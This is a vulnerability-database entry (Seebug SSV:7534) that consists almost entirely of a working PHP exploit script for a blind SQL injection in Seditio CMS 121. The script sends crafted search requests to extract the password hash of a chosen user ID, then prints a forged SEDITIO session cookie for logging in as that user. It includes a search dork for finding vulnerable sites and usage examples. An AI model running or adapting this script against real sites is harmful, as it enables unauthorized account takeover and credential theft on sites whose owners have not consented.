Seditio CMS 121 Remote SQL Injection Exploit

2007-11-30T00:00:00
ID SSV:7534
Type seebug
Reporter Root
Modified 2007-11-30T00:00:00

Description

No description provided by source.

                                        
                                            
                                                <?php
## Seditio CMS <= 121 Remote SQL Injection Exploit
## Software site: http://www.neocrome.net/
## By InATeam (http://inattack.ru/)
## Requirements: MySQL >= 4.1, magic_quotes_gpc=Off

echo \\\\\\\"------------------------------------------------------------\\\\\\\\n\\\\\\\";
echo \\\\\\\"Seditio CMS <= 121 Remote SQL Injection Exploit\\\\\\\\n\\\\\\\";
echo \\\\\\\"(c)oded by Raz0r, InATeam (http://inattack.ru/)\\\\\\\\n\\\\\\\";
echo \\\\\\\"dork: \\\\\\\\\\\\\\\"Powered by Seditio\\\\\\\\\\\\\\\"\\\\\\\\n\\\\\\\";
echo \\\\\\\"------------------------------------------------------------\\\\\\\\n\\\\\\\";

if ($argc<2) {
echo \\\\\\\"USAGE:\\\\\\\\n\\\\\\\";
echo \\\\\\\"~~~~~~\\\\\\\\n\\\\\\\";
echo \\\\\\\"php {$argv[0]} [url] OPTIONS\\\\\\\\n\\\\\\\\n\\\\\\\";
echo \\\\\\\"[url]        - target server where Seditio CMS is installed\\\\\\\\n\\\\\\\\n\\\\\\\";
echo \\\\\\\"OPTIONS:\\\\\\\\n\\\\\\\";
echo \\\\\\\"-p=<prefix>  - use specific prefix (default sed_)\\\\\\\\n\\\\\\\";
echo \\\\\\\"-id=<id>     - use specific user id (default 1)\\\\\\\\n\\\\\\\\n\\\\\\\";
echo \\\\\\\"examples:\\\\\\\\n\\\\\\\";
echo \\\\\\\"php {$argv[0]} http://site.com/ -p=cms_\\\\\\\\n\\\\\\\";
echo \\\\\\\"php {$argv[0]} http://cms.site.com:8080/ -id=2\\\\\\\\n\\\\\\\";
die;
}

error_reporting(0);
set_time_limit(0);
ini_set(\\\\\\\"max_execution_time\\\\\\\",0);
ini_set(\\\\\\\"default_socket_timeout\\\\\\\",10);
$url = $argv[1];
for($i=2;$i<$argc;$i++) {
   if(strpos($argv[$i],\\\\\\\"=\\\\\\\")!==false) {
       $exploded=explode(\\\\\\\"=\\\\\\\",$argv[$i]);
       if ($exploded[0]==\\\\\\\'-p\\\\\\\') $prefix = $exploded[1];
       if ($exploded[0]==\\\\\\\'-id\\\\\\\') $id = $exploded[1];
   }
}
if (!isset($prefix)) $prefix = \\\\\\\"sed_\\\\\\\";
if (!isset($id)) $id = 1;
$url_parts = parse_url($url);
$host = $url_parts[\\\\\\\'host\\\\\\\'];
if (isset($url_parts[\\\\\\\'port\\\\\\\'])) $port = $url_parts[\\\\\\\'port\\\\\\\']; else $port = 80;
$path = $url_parts[\\\\\\\'path\\\\\\\'];
print(\\\\\\\"[~] Connecting... \\\\\\\");
if (!getchar(\\\\\\\"<1\\\\\\\",$i,false)) print(\\\\\\\"OK\\\\\\\\n\\\\\\\");
else die(\\\\\\\"\\\\\\\\n[-] Exploit failed\\\\\\\\n\\\\\\\");
print(\\\\\\\"    Getting hash...\\\\\\\");
$hash=\\\\\\\'\\\\\\\';
for ($i=1; $i<=32; $i++) {
   if (!getchar(\\\\\\\">57\\\\\\\",$i)) {
       $min = 48;
       $max = 57;           }
   else {
       $min = 97;
       $max = 102;           }
   for($j=$min;$j<=$max;$j++) {
       if (getchar(\\\\\\\"+LIKE+$j\\\\\\\",$i)) {
           $hash .= chr($j);
           break;
       }
   }
}
print(\\\\\\\"[+] Done! hash - $hash\\\\\\\\n\\\\\\\");
print(\\\\\\\"[+] Cookie to log in: \\\\\\\\nSEDITIO=\\\\\\\".base64_encode($id.\\\\\\\":_:\\\\\\\".$hash.\\\\\\\":_:ice\\\\\\\").\\\\\\\"\\\\\\\\n\\\\\\\");

function getchar($query,$pos,$status=true){
   global $host,$path,$prefix,$id;
   if ($status) status();
   $data = \\\\\\\"sq=InATeam&frm_sub%5B%5D=9999&sea_frmtitle=1&sea_frmtext=1&sea_pagtitle=1\\\\\\\";
   $data.= \\\\\\\"&sea_pagdesc=1&sea_pagtext=1&searchin_pag=1&pag_sub%5B%5D=qwerty\\\\\\\')\\\\\\\";
   $data.= \\\\\\\"+AND+1=IF(ORD(MID((SELECT+user_password+FROM+{$prefix}users+WHERE\\\\\\\";
   $data.= \\\\\\\"+user_id={$id}),{$pos},1)){$query},1,(SELECT+1+UNION+SELECT+5))/*&x=GUEST\\\\\\\";
      $packet  = \\\\\\\"POST {$path}plug.php?e=search&a=search HTTP/1.1\\\\\\\\r\\\\\\\\n\\\\\\\";
   $packet .= \\\\\\\"Host: {$host}\\\\\\\\r\\\\\\\\n\\\\\\\";
   $packet .= \\\\\\\"Referer: http://{$host}{$path}plug.php?e=search&a=search\\\\\\\\r\\\\\\\\n\\\\\\\";
   $packet .= \\\\\\\"User-Agent: InAttack User Agent\\\\\\\\r\\\\\\\\n\\\\\\\";
   $packet .= \\\\\\\"Content-Type: application/x-www-form-urlencoded\\\\\\\\r\\\\\\\\n\\\\\\\";
   $packet .= \\\\\\\"Content-Length: \\\\\\\".strlen($data).\\\\\\\"\\\\\\\\r\\\\\\\\n\\\\\\\";
   $packet .= \\\\\\\"Connection: Close\\\\\\\\r\\\\\\\\n\\\\\\\\r\\\\\\\\n\\\\\\\";
   $packet .= $data;
   return (strpos(send($packet),\\\\\\\'Subquery returns more than 1 row\\\\\\\')===false) ? true : false;
}

function send($packet) {
   global $host,$port;
   $ock = fsockopen(gethostbyname($host),$port);
   if ($ock) {
       fputs($ock, $packet);
       $html=\\\\\\\'\\\\\\\';
       while (!feof($ock)) $html.=fgets($ock);
   }
   else die(\\\\\\\"[-] Exploit failed\\\\\\\\n\\\\\\\");
   return $html;
}

function status() {
   static $n;
   $n++;
   if ($n > 3) $n = 0;
   if($n==0){ print \\\\\\\"\\\\\\\\r[-]\\\\\\\\r\\\\\\\"; }
   if($n==1){ print \\\\\\\"\\\\\\\\r[\\\\\\\\\\\\\\\\]\\\\\\\\r\\\\\\\";}
   if($n==2){ print \\\\\\\"\\\\\\\\r[|]\\\\\\\\r\\\\\\\"; }
   if($n==3){ print \\\\\\\"\\\\\\\\r[/]\\\\\\\\r\\\\\\\"; }
}
?>